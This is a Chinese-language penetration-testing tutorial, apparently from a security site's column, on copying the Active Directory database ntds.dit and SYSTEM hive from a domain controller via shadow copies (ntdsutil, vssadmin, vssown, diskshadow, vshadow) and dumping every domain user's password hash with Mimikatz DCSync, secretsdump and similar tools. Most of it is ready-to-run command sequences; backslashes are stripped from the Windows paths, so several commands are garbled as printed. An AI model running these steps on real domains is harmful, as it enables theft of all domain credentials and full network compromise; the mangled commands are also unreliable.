ntds.dit为AD的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。
ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system文件来解密。
ntds.dit文件位置:
C:WindowsNTDSNTDS.dit
system文件位置:
C:WindowsSystem32configSYSTEM
在通常的情况下,即使我们拥有域管理员权限也无法读取ntds.dit文件,因为活动目录始终访问着这个文件,所以禁止读取,使用windows的本地卷影拷贝可以获得文件的副本。
Ntdsutil.exe 是一个为 Active Directory 提供管理设施的命令行工具。您可使用 Ntdsutil.exe 执行 Active Directory 的数据库维护,管理和控制单个主机操作,创建应用程序目录分区,以及删除由未使用 Active Directory 安装向导 (DCPromo.exe) 成功降级的域控制器留下的元数据。—— 百度百科
简单讲,Ntdsutil.exe就是一个AD域的命令行工具,可以复制域控系统快照并从中提取ntds.dit文件。
ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {0cf3ebc8-3f7a-415f-95f7-8e8cf923cecb}" quit quit
copy C:$SNAP_202302081523_VOLUMEC$WindowsNTDSntds.dit C:usersadministratordesktopcopy C:$SNAP_202302081523_VOLUMEC$WindowsSystem32configSYSTEM C:usersadministratordesktop
ntdsutil snapshot "unmount {0cf3ebc8-3f7a-415f-95f7-8e8cf923cecb}" "delete {0cf3ebc8-3f7a-415f-95f7-8e8cf923cecb}" quit quit
vssadminn是Windows Server 2008及 Windows 7提供的VSS管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息(只能管理系统Provider 创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序( writers )和提供程序( providers ),以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。
vssadmin create shadow /for=c:
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsNTDSntds.dit c:usersadministratordesktopntds.ditcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsSystem32configSYSTEM C:usersadministratordesktopSYSTEM
vssadmin delete shadows /for=c: /quiet
功能和vssadmin类似,一个可视化的脚本,可以创建和删除卷影副本,从卸载的卷影副本运行任意可执行文件,以及启动和停止卷影复制服务。
下载地址:
https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs
cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy4windowsntdsntds.dit C:usersadministratordesktopntds.ditcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy4windowssystem32configSYSTEM C:usersadministratordesktopSYSTEM
cscript vssown.vbs /delete {FBC1881F-ADF7-411B-AF81-2BE16D400A15}
DiskShadow是Microsoft签名的二进制文件,用于协助管理员执行与卷复制服务(VSS)相关的操作。该文件可以使用脚本模式,执行脚本中的所有命令,因此可以将拷贝ntds.dit文件的命令写入脚本中(c:1.txt):
#设置卷影拷贝
set context persistent nowriters
#添加卷
add volume c: alias someAlias
#创建快照
create
#分配虚拟磁盘盘符
expose %someAlias% g:
#复制ntds.dit和system文件
exec "cmd.exe" /c copy g:windowsntdsntds.dit c:usersadministratordesktopntds.dit && copy g:windowssystem32configSYSTEM c:usersadministratordesktopSYSTEM
#删除所有快照
delete shadows all
#重置
reset
#退出
exit
命令行执行:
diskshadow.exe /s c:1.txt
//注意这里一定要将目录切到c:windowssystem32下,不然会报错,脚本中的注释去掉
vshadow是一个简单的指令行工具,它允许任何人创建卷影拷贝。用户可以在最新版本的VSS SDK中找到这个工具。功能类似vssadmin,需要将系统对应版本的vshadow程序拷贝到系统中。
方法一:
vshadow-2008-r2-x64.exe -exec=%ComSpec% C:
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy6windowsntdsntds.dit c:usersadministratordesktopntds.ditcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy6windowssystem32configSYSTEM c:usersadministratordesktopSYSTEM
无需卸载,不会留下挂载痕迹。
方法二:
将vshadow-2008-r2-x64.exe改名为vshadow.exe,放在c.bat同目录下,命令行执行:c.bat c:windowsntdsntds.dit c:
公众号回复 vshadow 获取工具,解压密码:公众号黑客前沿
ntds.dit和system文件拷贝到本地,NTDSDumpEx执行以下命令:NTDSDumpEx.exe -d ntds.dit -s system
工具下载地址:
https://github.com/zcgonvh/NTDSDumpEx
QuarksPwDump.exe --dump-hash-domain -sf system -nt ntds.dit
无需system文件QuarksPwDump.exe --dump-hash-domain -nt ntds.dit
项目地址:
https://github.com/quarkslab/quarkspwdump
在域控机器执行Mimikatz "lsadump::dcsync /domain:test.com /all /csv" exit
工具下载地址:
https://github.com/gentilkiwi/mimikatz
kali下安装impacket
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install .
python3 setup.py install
cd examples
将ntds.dit和system文件拷贝到kali桌面,执行命令python3 secretsdump.py -ntds /home/kali/Desktop/ntds.dit -system /home/kali/Desktop/SYSTEM LOCAL
本文作者:黑客前沿
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/195792.html
必填 您当前尚未登录。 登录? 注册
必填(保密)